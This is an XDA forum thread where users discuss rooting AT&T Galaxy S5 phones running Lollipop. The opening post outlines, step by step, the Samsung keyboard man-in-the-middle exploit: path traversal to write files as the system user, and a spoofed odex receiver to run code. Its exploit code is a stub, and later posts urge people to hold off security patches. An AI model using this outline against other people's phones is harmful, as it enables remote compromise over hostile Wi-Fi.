Achieving Root on OTA 5.0 G900A using keyboard vuln? - AT&T Samsung Galaxy S 5

Hey guys, this is my first post on XDA, so I hope I have it in the correct format and place; if not, just politely let me know and I will adjust the post accordingly. This is also just a theory I have on how to achieve root with the OTA 5.0 update, and would like the community's feedback on whether this would work or not.
First, let me start by saying that I don't have much experience with rooting, but I have done a lot of reading and research about how it works and feel like I have a good understanding of how it works. I do however, have a lot of programming and computer security experience, so I like to stay current on active vulnerabilities and such, whether it be on mobile devices or computers.
So I was stupid took the OTA update to 5.0 before checking to see if anyone managed to achieve root, to find out that 5.0 root hasn't been achieved on my model yet so I started to look for a way to do it myself. As I was browsing around for general info on the G900A, the keyboard vulnerability stuck out to me immediately.
To summarize the vuln: "A remote attacker capable of controlling a user’s network traffic can manipulate the keyboard update mechanism on Samsung phones and execute code as a privileged (system) user on the target’s phone. This can be exploited in a manner that requires no user interaction — a user does not have to explicitly choose to download a languagePack update to be exploited." So essentially, if I were to set up my own rogue Wi-Fi access point, I'd be able to execute any code I want in a privileged context.
On NowSecure's website, they go into deep detail on the specific steps of recreating this exploit, but to summarize here are the general steps:
Step 1:
Set a global Wi-Fi proxy and point our device at mitmproxy on our computer
(Essentially creating your own controlled Man-In-The-Middle attack for your phone)
Step 2:
Write a script that feeds the phone a zip containing our payload upon download request from the keyboard
Step 3:
Precompute the SHA1 of our payload and create a custom manifest file containing the SHA1
Add path traversal to the payload and attempt to write to /data/
Now, we have an arbitrary file write as system user. Next, we attempt to turn this file write ability into code execution.
Step 4:
Choose DeviceTest.apk as our target to exploit (this file is owned by a group system and is automatically invoked)
Generate an odex file with code for a BroadcastReceiver named com.sec.factory.entry.FactoryTestBroadcastReceiver
The exploit source will look like this:
Code:
➜cat FactoryTestBroadcastReceiver.java | head
package com.sec.factory.entry;
import java.lang.Class;
import java.io.File;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class FactoryTestBroadcastReceiver extends BroadcastReceiver {
//Exploit code here
}
Step 5:
Once the payload is created, we compile it and run it through the DalvikExchange (dx) tool to get a .jar file which includes our dalvik bytecode
Push our jar to our phone and generate the odex using
Code:
ANDROID_DATA=/data/local/tmp dalvikvm -cp /data/local/tmp/<payload.jar> com.sec.factory.entry.FactoryTestBroadcastReceiver
This will put our cache file in a directory that is readable by the shell user.
Step 6:
Patch our .odex to contain the CRC32 and modification time from the original APK's zip file so it appears to be generated from the original DeviceTest.apk
Step 7:
Trigger the vulnerability to execute the payload
Here is the fully detailed article .
So my question is: would it be feasible to use this vuln to create a payload that injects root into the system?
To check to see if you're vulnerable to this exploit
Download a terminal emulator on your phone and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than 2015-03-16 you are vulnerable.
UPDATE: As of July 1, 2015, AT&T appears to have rolled out a small OTA update that updates the bootloader from OC4 to OF2 as well as patches the keyboard vulnerability. As long as you don't take the update and the date modified for SamsungIME.apk is earlier than 2015-03-16, this vulnerability could still be of some potential benefit.

Here is the link your wanting to post.
https://www.nowsecure.com/blog/2015/06/16/remote-code-execution-as-system-user-on-samsung-phones/
I really hope you are on to something.
I used terminal emulator and it looks like this (attached)
Looks like I'm vulnerable.
You seem to know your stuff and I hope some people can work with you to make some things happen
I just read the full article your source.. in theory root should be possible. I'm not sure how but maybe using the exploit to install cf as a system app. Then it could run with higher privileges I suppose. Or maybe just a custom zip to obtain the root.
Damn this makes me happy! I only wish I was smart enough to make it work lol
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

adam_ky said:
I really hope you are on to something.
I used terminal emulator and it looks like this (attached)
Looks like I'm vulnerable.
Click to expand...
Click to collapse
Thank you!
I'd really love to collaborate with some devs or something. I would be able to test most of those steps out myself, but would need help with the scripting of the actual payload. Then if it actually works, I ultimately would want to automate it and turn it into a redistributable application that anyone could use by just clicking a few buttons (seeing as how literally every non-rooted S5 should be vulnerable, I would want anyone to be able to use it). But I would need some help on that as well.
Also, until I (or anyone else) can confirm that this method either succeeds or fails, I'd hold off on taking any security updates that may patch this, just in case this method does end up working.
adam_ky said:
I just read the full article your source.. in theory root should be possible. I'm not sure how but maybe using the exploit to install cf as a system app. Then it could run with higher privileges I suppose. Or maybe just a custom zip to obtain the root.
Click to expand...
Click to collapse
That's exactly what I was thinking. If this exploit works the way I think it will, there should be no real constraints on the code you can execute and privilege escalation should be a breeze whether it's with something like cf, or a custom zip.
adam_ky said:
Damn this makes me happy! I only wish I was smart enough to make it work lol
Click to expand...
Click to collapse
Haha I was pretty ecstatic when I happened upon this and I couldn't really believe that no one else had put these two ideas together before I did. I tend to be more of a lurker on forums, so I was kind of iffy about posting this, but I'm really glad it's being well-received so far!
I'm really excited for this exploit's potential and can't wait to see where this leads!

https://www.nowsecure.com/blog/2015/06/16/remote-code-execution-as-system-user-on-samsung-phones/
I'm not sure it would be possible for an automated means of execution via an app or something. The one step in the process mentions that what has to be entered is device unique. But with the exploit it is kind enough to give you that bit of info needed.
The best we might be able to hope for here is connecting to your own personal wifi network with capabilities of injecting code exploit. Which shouldn't be to hard really.
We just need someone to create a payload for us and have a good step by step howto.
I'd be willing to volunteer both my time and device for testing this. I like you, just need a but of help.
However if no help comes I may try it myself lol
I'm pretty sure I can work out the steps . And set up a connection that's capable of injecting the code threw the keyboard exploit. I just need help with the scripts.
This exploit could do so much really... besides root. You could use it to delete preload bloat system apps. You could use it to edit the build.prop. you could use it to manually edit the host file. Should be able to run the script that allows read/write permissions over whole device for user.
I'm glad I have had my security updates set to off since the beginning as this has supposedly been fixed and pushed by samsung threw the policy updates
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

adam_ky said:
I'm not sure it would be possible for an automated means of execution via an app or something. The one step in the process mentions that what has to be entered is device unique. But with the exploit it is kind enough to give you that bit of info needed.
The best we might be able to hope for here is connecting to your own personal wifi network with capabilities of injecting code exploit. Which shouldn't be to hard really.
We just need someone to create a payload for us and have a good step by step howto.
I'd be willing to volunteer both my time and device for testing this. I like you, just need a but of help.
However if no help comes I may try it myself lol
I'm pretty sure I can work out the steps . And set up a connection that's capable of injecting the code threw the keyboard exploit. I just need help with the scripts.
This exploit could do so much really... besides root. You could use it to delete preload bloat system apps. You could use it to edit the build.prop. you could use it to manually edit the host file. Should be able to run the script that allows read/write permissions over whole device for user.
I'm glad I have had my security updates set to off since the beginning as this has supposedly been fixed and pushed by samsung threw the policy updates
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Click to expand...
Click to collapse
Yeah, by automating it, I was thinking more along the lines of building an executable to be run on a computer that contains the necessary MITMproxy program, script for feeding the phone a zip, the actual payload, etc.
And the unique identifiers should only change based on the current version of android and which variant of the phone it is. So if I'm reading it right, the identifiers should all be the same for every G900A running 5.0. Either way, this exploit should be easy enough for most everyone to use, but it'd still be nice to make a program with a nice interface to it.
Yeah, I think with this exploit you could basically have control over just about anything you want, the only hard part would be making a payload for each thing you want to do.
As far as the exploit being fixed by Samsung, I think they have acknowledged the exploit and have "fixed" it, but the patches either haven't been pushed from Samsung to the carriers for distribution or the carriers haven't pushed out the update to fix it yet. According to NowSecure's website,
"As of June 16 2015, this is the known (but not all-inclusive) list of impacted devices by carrier with patch status:
Device | Carrier* | Patch Status
Galaxy S6 | Verizon | Unpatched
Galaxy S6 | AT&T | Unknown
Galaxy S6 | Sprint | Unpatched
Galaxy S6 | T-Mobile | Unknown
Galaxy S5 | Verizon | Unknown
Galaxy S5 | AT&T | Unknown
Galaxy S5 | Sprint | Unknown
Galaxy S5 | T-Mobile | Unpatched
Galaxy S4 | Verizon | Unknown
Galaxy S4 | AT&T | Unknown
Galaxy S4 | Sprint | Unknown
Galaxy S4 | T-Mobile | Unknown
Galaxy S4 Mini | Verizon | Unknown
Galaxy S4 Mini | AT&T | Unpatched
Galaxy S4 Mini | Sprint | Unknown
Galaxy S4 Mini | T-Mobile | Unknown
"
So I'm fairly certain that there won't be many phones that have the exploit patched (yet), which is definitely a good thing for all of us right now.

I wish some other people would chime in... surely this intrests more ppl than just you and I.
I'm sure this community can make something workable out of this exploit.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

I really do too. I thought people would be all over this, and this is really the best place to post it

Today I had a talk with Samsung IT crew. General reason was wifi leakage on boc3 firmware on Sm-n910c. Also had a talk about keyboard vulnerability. Samsung's IT leading engineer told they know about it and it's on final stage of fixing. So in very short time it's gonna be fixed and no more hacking over keyboard will be available. So this door is finally to close soon(bad part is that also rooting over it will be impossible, but it's nice that Samsung very soon rolls out a fix for it so no more remote injections and rahcking will be possible). So hurry up, doors are closing soon finally. You should contact chainfire, maybe he will help you in rooting that phone.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

Sapphire999 said:
Today I had a talk with Samsung IT crew. General reason was wifi leakage on boc3 firmware on Sm-n910c. Also had a talk about keyboard vulnerability. Samsung's IT leading engineer told they know about it and it's on final stage of fixing. So in very short time it's gonna be fixed and no more hacking over keyboard will be available. So this door is finally to close soon(bad part is that also rooting over it will be impossible, but it's nice that Samsung very soon rolls out a fix for it so no more remote injections and rahcking will be possible). So hurry up, doors are closing soon finally. You should contact chainfire, maybe he will help you in rooting that phone.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
Click to expand...
Click to collapse
Oh interesting. Did they happen to mention any kind of time frame or just that they were in the final stages?
And I'll try to contact chainfire, but it seems like he hasn't been active on his G+ for a few months.

They told it's on final tasting stage. But that about Galaxy Note 4 talk, that we had. Not sure about other models. I simply asked of it since it bad when over wifi my phone can be hacked by some man in a middle. So if you plan still use that keyboard hack, you probably should ban updates to avoid that door closed.
And as they told roll out can happen from day to day. Meant very soon.
I also searched the web, your device should be rootable. If last ota update hack fails, use sammobile and downgrade os to root it and then search rooted custom roms
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

Sapphire999 said:
They told it's on final tasting stage. But that about Galaxy Note 4 talk, that we had. Not sure about other models. I simply asked of it since it bad when over wifi my phone can be hacked by some man in a middle. So if you plan still use that keyboard hack, you probably should ban updates to avoid that door closed.
And as they told roll out can happen from day to day. Meant very soon.
I also searched the web, your device should be rootable. If last ota update hack fails, use sammobile and downgrade os to root it and then search rooted custom roms
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
Click to expand...
Click to collapse
Ah, ok. Thank you for sharing and I'll definitely keep any updates disabled.
And I think there's a problem with downgrading due to the bootloader being locked by AT&T.

You're welcome. My device is unlocked likely. Any way guess you can search sammobile. Maybe you will sucess somehow to downgrade.
Loool. I have an idea. If you success hacking keyboard etc, probably you could somehow face ota to downgrade firmware. Hmmm... you know what. There is an option. Not sure if it will work, but still. Try getting custom rom. And boot your phone even with original firmware into recovery mode. Usually volume up + home + power. If it works, you can make restore from zip deploying custom rom.
Maybe it will not work, but you can try. If a bit lucky, you wouldn't need root on current rom. No warranties and it just in theory. Try at your own risk.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
---------- Post added at 04:42 AM ---------- Previous post was at 04:22 AM ----------
http://hexamob.com/how-to-root/android-rooting-method-samsung-galaxy-s5/
Doesn't this one work for you?

No, that way doesn't work and is for a previous version of android, not 5.0. When the G900A is updated to 5.0, the bootloader firmware is updated to patch the exploit that that method uses.

https://www.youtube.com/watch?v=1dYoDX07Cks
Told any S5 lolipopp running. Unfortunally or likely, I don't know what locked bootloader mean. Never had such. Does it mean that recovery mode and odin mode are unavailable(not launchable)?

As of this moment, if a att s5 sm g900a took the ota update to lolipop, there is no means to gain root access.
If you achieve root on kitkat, you can update to lolipop and keep root.. but that's it.
This keyboard exploit is our only possible ray of hope at this moment.
Root may not even be possible with it as it runs with system privilages.. which is actually not the same as root privilages.. however system privilages can do a lot and I got hope for it.
Even if root can't be obtained.. this exploit could be used to do things to the device that we currently cant. Could possibly remove system and preinstalled bloat. It can defiantly install an app as a system app... that should be able to a compliance quite a bit.
The possibilities are endless really.
I am thankful the exploit is there and hope we can acompliwb something with it before everyone gets patched.
I have my security policy updates disabled and I suggest you do the same for the time being if anyone out there is in the same boat as us.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

Couldn't have said it better myself.
Also, I have attempted to contact Chainfire on both of his G+ accounts, so hopefully something can come of that too.

Hmm if so, just keep it mind not only to disable updates, but to keep away from wifis with internet access. On some conditions auto update setting are ignored, if connected to wifi. Surely depends on exact system and model. But keep it in mind. Well. If you gain system app privilegies, then possibly you get partitions access. That a hope to deploy something like twrp recovery and flash custom rom. Info about soon coming keyboard breach fix I got for GN4 model SEB (Baltic) region. Cann't say anything exact about other models and regions. But generally if Samsung is one step away from rolling it out in Baltic, quite possible other regions coming also soon.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

I just got an update and it's a bootloader upgrade from oc4 to I forgot and I suspended the update till I can get some more info . Check and see if you have it .
Sent from my SAMSUNG-SM-G900A using Tapatalk

superp32 said:
I just got an update and it's a bootloader upgrade from oc4 to I forgot and I suspended the update till I can get some more info . Check and see if you have it .
Sent from my SAMSUNG-SM-G900A using Tapatalk
Click to expand...
Click to collapse
From all the information I've gathered, this update does appear to patch the keyboard.
EDIT: I do have an available update too and attached a screenshot.
EDIT 2: I've seen the "Date modified" of the SamsungIME.apk change to one of two dated after taking the small OTA, either 2014-03-25 or 2015-03-16. If the date is the one from 2014, the vulnerability should still be active, but if it's the newer one, it appears to have been patched.

FYI... I posted the screen shot showing the 2015 update but my phone was already loaded with 5.0/OC4 when I received it from at&t last week and I have not updated to the new bl. Hope some can still benefit from the keyboard vulnerability even if I can't.

Related

How long till we may see the 6 rooted?

I've never owned a Nexus/Google phone, how long would you all guess it's going to take to root the Nexus 6?
Thanks! :fingers-crossed:
Kidding I hope
Pyros2008 said:
I've never owned a Nexus/Google phone, how long would you all guess it's going to take to root the Nexus 6?
Thanks! :fingers-crossed:
Click to expand...
Click to collapse
Before you even get it
Sent from my A0001 using XDA Free mobile app
Nope, the first time I rooted was a month ago, my Note 3. I take it the device can be rooted off the bat.. or there something else I am missing?
Give Chainfire a couple hours with the phone
Pretty sure the process will be similar to other Nexus devices... Fastboot oem unlock, etc, etc.
http://phandroid.com/2014/11/17/nexus-6-lollipop-root/
all hail king chainfire?
kgeissler said:
http://phandroid.com/2014/11/17/nexus-6-lollipop-root/
Click to expand...
Click to collapse
That has 6 nexus devices with root. Bit not the nexus 6.
I would make sure to wait until Google releases the factory image before rooting just in case something goes wrong
I'm pretty sure that the factory images have to be out as he has to create a modified kernel for the N6 for superuser to work on 5.0.
lordgodgeneral said:
I'm pretty sure that the factory images have to be out as he has to create a modified kernel for the N6 for superuser to work on 5.0.
Click to expand...
Click to collapse
I think he just patches the existing kernel so don't think he would need images. Think being the key word there as I don't know for sure how it works exactly.
You don't need a developer to root a nexus. Boot into the bootloader, connect to your computer, run: fastboot oem unlock, then install the recovery of your choice via fastboot (fastboot flash recovery blahxxx.img), then just flash whatever superuser you want (e.g. SuperSU)
Sent from my XT1053 using Tapatalk
bongostl said:
You don't need a developer to root a nexus. Boot into the bootloader, connect to your computer, run: fastboot oem unlock, then install the recovery of your choice via fastboot (fastboot flash recovery blahxxx.img), then just flash whatever superuser you want (e.g. SuperSU)
Sent from my XT1053 using Tapatalk
Click to expand...
Click to collapse
Sorry but this is no longer accurate. First off, there are no custom recoveries yet. Second, lollipop requires additional work arounds for root other than just flashing superuser.
akellar said:
Sorry but this is no longer accurate. First off, there are no custom recoveries yet. Second, lollipop requires additional work arounds for root other than just flashing superuser.
Click to expand...
Click to collapse
Hm? I'm running oneplus one with root on lollipop. All I had to do was just flash supersu in recovery.
Hopefully we can see a twrp on nexus 6 soon.
Sent from my A0001 using Tapatalk
zephiK said:
Hm? I'm running oneplus one with root on lollipop. All I had to do was just flash supersu in recovery.
Hopefully we can see a twrp on nexus 6 soon.
Sent from my A0001 using Tapatalk
Click to expand...
Click to collapse
It's likely not a complete build with the SELinux improvements that google made to the kernel. You need to modify the kernel on lollipop to have root so your one plus probably just has a ROM not a full image of the lollipop on it. Also as stated earlier you can't root anything without the factory image posted by google for the nexus. Then the developers can have at it. Until your happens we are just left waiting.
Pilz said:
It's likely not a complete build with the SELinux improvements that google made to the kernel. You need to modify the kernel on lollipop to have root so your one plus probably just has a ROM not a full image of the lollipop on it. Also as stated earlier you can't root anything without the factory image posted by google for the nexus. Then the developers can have at it. Until your happens we are just left waiting.
Click to expand...
Click to collapse
SELinux is currently permissive and yep its built off CM12 sources. But to answer OP's question, probably won't take too long but no ETAs.
zephiK said:
SELinux is currently permissive and yep its built off CM12 sources. But to answer OP's question, probably won't take too long but no ETAs.
Click to expand...
Click to collapse
Then that's why you can flash it in recovery. Normally you wouldn't be able to if it wasn't changed.
Chainfire said:
On LPX13D, SELinux, and root
As promised, here are some more details about the current situation.
Why it breaks
Google has really put some effort into better securing Android, and we've seen a lot of SELinux related commits to the AOSP tree over the past months. There is some disconnect between the AOSP tree and actual L preview builds, some things from AOSP are not in the L preview build, and vice versa. Ultimately, it's a pretty good bet these things will mostly align, though.
On most devices and firmwares, SuperSU's daemon is started by the install-recovery.sh service script that runs at system boot time, as user root with the init context. This is what the daemon needs to function.
Recently, they've started requiring all started services to run in their own SELinux context, instead of init. Developers and security guys following AOSP have known this was coming; AOSP builds have been logging complaints about this specific service not having its own context for a while now.
Now this script runs as root, but as the install_recovery context, which breaks SuperSU's operation, as it is a very restrictive context.
In the last AOSP build I have tried (a few weeks old), there were a fair number of other holes that we could use to launch the daemon. At first glance(!), it seems those have all been closed. An impressive feat by the guys working on this, if it proves true.
How to fix it
To fix root, all that really had to be done was ensure the daemon's startup script is run at boot as the root user with the init context.
There are multiple ways to do this, but unfortunately for now it seems that it does require a modified kernel package (changing the ramdisk).
In the modified kernel packages I've posted for the Nexus 5 and Nexus 7, the daemon's startup is fixed by commenting out the line in init.rc that forces the install-recovery.sh script to run as the install_recovery context, so now it runs as init again, and all is well.
Repercussions
As stated above, it seems for now that modifications to the kernel package are required to have root, we cannot attain it with only modifications to the system partition.
Combine that with a locked bootloader (and optionally dm-verity) and a device becomes nigh unrootable - exactly as intended by the security guys.
Exploit-based roots are already harder to do thanks to SELinux, and now because of the kernel requirements for persistent root, these exploits will need to be run at every boot. Exploits that make the system unstable (as many do) are thus out as well.
Of course, this is all dependent on OEMs implementing everything exactly right. If a certain OEM doesn't protect one of their services correctly, then we can leverage that to launch the daemon without kernel modifications. While I'm fairly certain this will be the case for a bunch of devices and firmwares, especially the earlier L firmwares, this is not something you should expect or base decisions on. It is now thus more important than ever to buy unlocked devices if you want root.
It might also mean that every firmware update will require re-rooting, and OTA survival mode will be broken. For many (but far from all) devices we can probably automate patching the kernel package right in the SuperSU installer ZIP. We can try to keep it relatively easy, but updating stock firmwares while maintaining root is probably not going to work as easy and fast as it did until now.
Apps need updates
Unsurprisingly, with a new major Android release, apps will need updates. None more so than apps that go beyond the Android API, as root apps do, but even some non-root apps will be affected by the security changes.
As one example, someone posted in the SuperSU thread of a kernel flashing app that didn't work. From the logcat you could see that it was looking for partitions in /dev/block from its normal non-root user and non-init context. That used to be possible, but now it is restricted: normal apps no longer have read access there.
The solution for that app is actually quite simple: list the /dev/block contents using root instead. But simple solution or not, the app will still need to be updated.
By far most root apps should be updateable for L without too much issue. There are indeed exceptions that will need some special care, but those are rare.
Permissive vs enforcing
The kernel packages I posted for the Nexus 5 and 7 LPX13D firmware keep SELinux mostly set to enforcing. I say mostly, because SuperSU actually switches a small part of the system to permissive, so apps calling su can do most things without much interference. The details on this are lengthy (yes, your apps will be able to modify policies as well if needed, which should be rare), and I will document these for other developers after L retail release, assuming it will all still work at that time.
Alternatively, you can set the whole system to permissive or otherwise disable SELinux. There are other kernel packages released that indeed do this. The advantage here is that it instantly fixes some apps' issues, as the SELinux based restrictions have all gone the way of the dodo. The disadvantage here is that you've just shut down a major part of the security system of the device.
Some would argue that a device with an unlocked bootloader, root, encrypted modem firmwares of which nobody really knows what they're doing, etc, is inherently insecure, and thus disabling SELinux doesn't make much difference.
I personally disagree with this. While I do agree that these things weaken security down from the ideal level, I would still not disable more security features than I absolutely need to. Just because you cannot eliminate all attack vectors, is no reason to just completely give up on defending against them.
It is of course your own choice if you want to run a permissive system or not. I will strive to keep everything working in enforcing mode though, and I hope other root app developers will do the same - as stated earlier in the post, I believe this is still possible.
(everything in this post is subject to change for retail L release, obviously)
Click to expand...
Click to collapse
https://plus.google.com/+Chainfire/posts/VxjfYJnZAXP
http://www.xda-developers.com/android/supersu-beta-2-23-lollipop/
Pilz said:
Then that's why you can flash it in recovery. Normally you wouldn't be able to if it wasn't changed.
Click to expand...
Click to collapse
Good news everyone, starting one of the upcoming SuperSU updates, modified kernels will no longer be needed for root on Android 5.0 ... !
Click to expand...
Click to collapse
https://twitter.com/ChainfireXDA/status/535253476021116928

[Q] July 1st, 2015 OTA updated bootloader

Hey guys, I just checked my At&t GS5 for updates and I had an available update to take. It was approximately 295 MB and it changed the bootloader from OC4 to OF2, however, my android version is still 5.0.
I've searched xda, I've called At&t, and I've been on Google and I cannot find anything on today's small update that changed my bootloader from OC4 to OF2.
My question is this:
Does anybody know what the current version of lollipop is supposed to be for the At&t galaxy s5 SM-G900A, and does anybody know why AT&T would push out such a small update that changes the bootloader? I'm not trying to root- when I get back into rooting, I'll use a non carrier branded phone or a model without a locked bootloader.
I realize that 5.1.1 is confirmed on the att galaxy s5 at some point, but I'm very confused about today's update that I took. I'm still on android 5.0 and I keep hitting brick walls regarding the SM-G900A, it's current version of lollipop, and what this update that I received today that changed my bootloader /build from OC4 to OF2.
Will someone please explain how this works? If they updated the bootloader today, 7/1 /15, and I'm still on 5.0, could it mean that 5.1 is around the corner?
I'm asking because I've never seen an update that changed the build number and bootloader, but didn't change the android version running on the phone.
Thanks yall.
No information on the update, if I were to guess this is to patch the Samsung Keyboard vulnerability.
Though it's over 200MB and I'm probably completely wrong
Maybe I can dream that AT&T decrypted the bootloader?
It's weird...Im on 5.0 but not on the OC4 bootloader any longer...it wasn't a very big update.
M2490311, Would you mind checking to see if it did patch the keyboard vulnerability?
To check to see if you're vulnerable to this exploit:
Download a terminal emulator from the play store and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than July 1, 2015 , it did not patch the vulnerability.
Also, if you do check to see if it was patched, could you take a screenshot of the terminal?
Code:
About this update:
Real Upgrade from OC4 to OF2
Thanks AT&T
Looks like it's been patched up, date changed but it's still old.
http://i.imgur.com/MYghs6Q.png
TheBadgers said:
M2490311, Would you mind checking to see if it did patch the keyboard vulnerability?
To check to see if you're vulnerable to this exploit:
Download a terminal emulator from the play store and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than July 1, 2015 , it did not patch the vulnerability.
Also, if you do check to see if it was patched, could you take a screenshot of the terminal?
Click to expand...
Click to collapse
I downloaded the terminal emulator and entered the exact code you provided and it kicks back with "not found."
M2490311 said:
I downloaded the terminal emulator and entered the exact code you provided and it kicks back with "not found."
Click to expand...
Click to collapse
Could you provide a screenshot?
Thanks AT&T
Looks like it's been patched up, date changed but it's still old.
Click to expand...
Click to collapse
Even if it's not the same date, as long as it's older than 2015, I think the vulnerability should still be active. Taken from NowSecure's website,"While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network." So it appears that Samsung themselves didn't even start working on a patch until 2015.
See attached.
ssn713 said:
I'm guessing it's been patched.
Click to expand...
Click to collapse
Whelp. Unfortunately in your case, it does appear to be patched. From what I've read, Samsung developed a patch for it in early 2015, which lines up with the "Date Modified" for your apk
QuillOmega0 said:
Maybe I can dream that AT&T decrypted the bootloader?
Click to expand...
Click to collapse
I would like to hear from someone that took the update to confirm or deny this part.
Mostlikely, wishfull thinking/dream.. but would be nice
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Sorry for the delay in responding. I entered both values posted earlier using the android terminal emulator, and this is what I am getting:
Sorry about the repeat screenshots, I couldn't tell them apart by thumbnails. I hope this helps and again, I apologize for the delay for the poster requesting screenshots
So now my question is what does this mean. It's my understanding (I may be wrong but I keep seeing conflicting info that's not up to date when I search it) that at this point in time, you can't Odin back from 5.0 to 4.4.2 or 4.4.4. I'm also under the impression that root is either nonexistent with the GS5 SM-900A or its a tedious process that isn't simple like towelroot. I wonder if this is going to affect root ability, and downgrade ability to attain root as well.
But then again, I was running the Sickness v6 on my s4 and safesstrap literally just ceased to work and my phone bricked itself. The entire OS crashed so I went to the att store, upgraded to the s5 and they reflashed the s4. But on my s5, Knox isn't capable of being device admin, and my s5 acts as though it's been rooted. I use a different security suite than knox, but I recall reading that if you root and flash a custom rom, and have the official stock firmware put back on, that knox won't work on your phone. This s5 has not been rooted unfortunately but the knox thing is making me wonder if something on my SD card transmitted an STD.
I think I'll be sick if root was attained with ease and I missed it by a mile in my searches on the OC4 bootloader and now that I'm on OF2, I'm screwed if I want root.
That is strange that it's not found.. I'm sorry I don't know what to make of it. I would have expected to see it updated but not missing
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
M2490311 said:
Sorry for the delay in responding. I entered both values posted earlier using the android terminal emulator, and this is what I am getting:
Sorry about the repeat screenshots, I couldn't tell them apart by thumbnails. I hope this helps and again, I apologize for the delay for the poster requesting screenshots
Click to expand...
Click to collapse
I think you're substituting 1's (the number) where you should be putting l's (the letter).
adam_ky said:
That is strange that it's not found.. I'm sorry I don't know what to make of it. I would have expected to see it updated but not missing
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Click to expand...
Click to collapse
You know what? I think that I can get back into rooting if I complain about this s5 that's under warranty, and get a replacement that is on kitkat, and I can just work my way back up to an L based TouchWiz rom on the replacement.
My knox is weird....it's like it wasn't baked in, and is only available for download on Google play, and I have a few apps that are not visible on the google play store on other devices. Unless I'm losing my mind. I have Contra Evolution that's Konami based and if I search it on the store, its gone, but it's still in my saved apps. I'm gonna feel really dumb if I'm rooted and don't know it.
ssn713 said:
I think you're substituting 1's (the number) where you should be putting l's (the letter).
Click to expand...
Click to collapse
Ohhhhhhhhhhhhh.....
Hold on.
Well not having Knox "baked in" is a good thing. I'm sure there are ways to see if u are rooted. I think there is an app to check it
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Still getting a whole lot of nothing I guess...
adam_ky said:
Well not having Knox "baked in" is a good thing. I'm sure there are ways to see if u are rooted. I think there is an app to check it
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Click to expand...
Click to collapse
Totally, I'm definitely not going to complain about it because those knox updates are annoying and almost intrusive to the experience. I have at least 20 root apps that I've paid for so I'm going to see what joeykrim has to say lol

Possible ways to achieve root?

So I actually don't have the S5, or any Samsung device for that matter, but a friend of mine does, and really wants to root their phone. I had no idea the AT&T S5 was so secure, but it's pretty interesting too. I've been researching for over 15 hours. I may not have been able to root his phone, but I think I have learned a couple things and maybe some possible root methods.
1.) Since using ODIN to downgrade would soft brick the phone, would it be possible to download the stock Lollipop update onto a computer, give the update super user access, replace the recovery with a custom one, or unlock the bootloader from the computer, then flash it through ODIN?
2.) Intercept any sort of OTA update, then alter it to flash a custom recovery or unlock bootloader? I don't know how you would go around this though.
3.) If someone hasn't taken the OTA update that patched the Stagefright exploit, could someone purposely use the exploit to allow installation of a custom recovery or even to unlock the bootloader since the Stagefright bug has super user access (or so I've heard).
Also, I'm sorry if these are stupid ideas. I know close to nothing about Samsung so everything I'm basing this off of is what I've read in the past 15 hours.
jsmithfms said:
So I actually don't have the S5, or any Samsung device for that matter, but a friend of mine does, and really wants to root their phone. I had no idea the AT&T S5 was so secure, but it's pretty interesting too. I've been researching for over 15 hours. I may not have been able to root his phone, but I think I have learned a couple things and maybe some possible root methods.
1.) Since using ODIN to downgrade would soft brick the phone, would it be possible to download the stock Lollipop update onto a computer, give the update super user access, replace the recovery with a custom one, or unlock the bootloader from the computer, then flash it through ODIN?
2.) Intercept any sort of OTA update, then alter it to flash a custom recovery or unlock bootloader? I don't know how you would go around this though.
3.) If someone hasn't taken the OTA update that patched the Stagefright exploit, could someone purposely use the exploit to allow installation of a custom recovery or even to unlock the bootloader since the Stagefright bug has super user access (or so I've heard).
Also, I'm sorry if these are stupid ideas. I know close to nothing about Samsung so everything I'm basing this off of is what I've read in the past 15 hours.
Click to expand...
Click to collapse
The issue is that AT&T (and Verizon) use an encrypted signature key to verify they are the correct unaltered files as well as the means to unlock the bootloader to allow the OTA. Without that key, the tasks you mention are near impossible. They are not stupid ideas at all..just very difficult with all the security checks included.
KennyG123 said:
The issue is that AT&T (and Verizon) use an encrypted signature key to verify they are the correct unaltered files as well as the means to unlock the bootloader to allow the OTA. Without that key, the tasks you mention are near impossible. They are not stupid ideas at all..just very difficult with all the security checks included.
Click to expand...
Click to collapse
Crap... well does anyone know how that encyption key is generated? Like, could I theoretically get an algorithm from a ROM?
Honestly for the time being I wouldn't bother with ROMS for that Device and carrier at the moment. Especially being that its someone elses device. Towelroot should be a good start. If Im not mistaken I don't think its supposed to trip knox.
Sent from my HTCEVODesign4G using XDA Free mobile app
jsmithfms said:
Crap... well does anyone know how that encyption key is generated? Like, could I theoretically get an algorithm from a ROM?
Click to expand...
Click to collapse
This is the riddle of the Sphinx my friend. I am sure the super devs have tried their best so far to crack it. It has been an ongoing effort to make phones more and more secure, not against the amateur developers and rooters, but against the hackers. These smartphones are now our personal computers, diaries, personal assistants, financial operator, and more. They basically are a person's (and business's) life. AT&T and Verizon have taken the big steps to appeal to the Exchange clients, corporate, government and military contracts. Even the general public want to know their phone is secure. This is what keeps me stuck on the Sprint network.
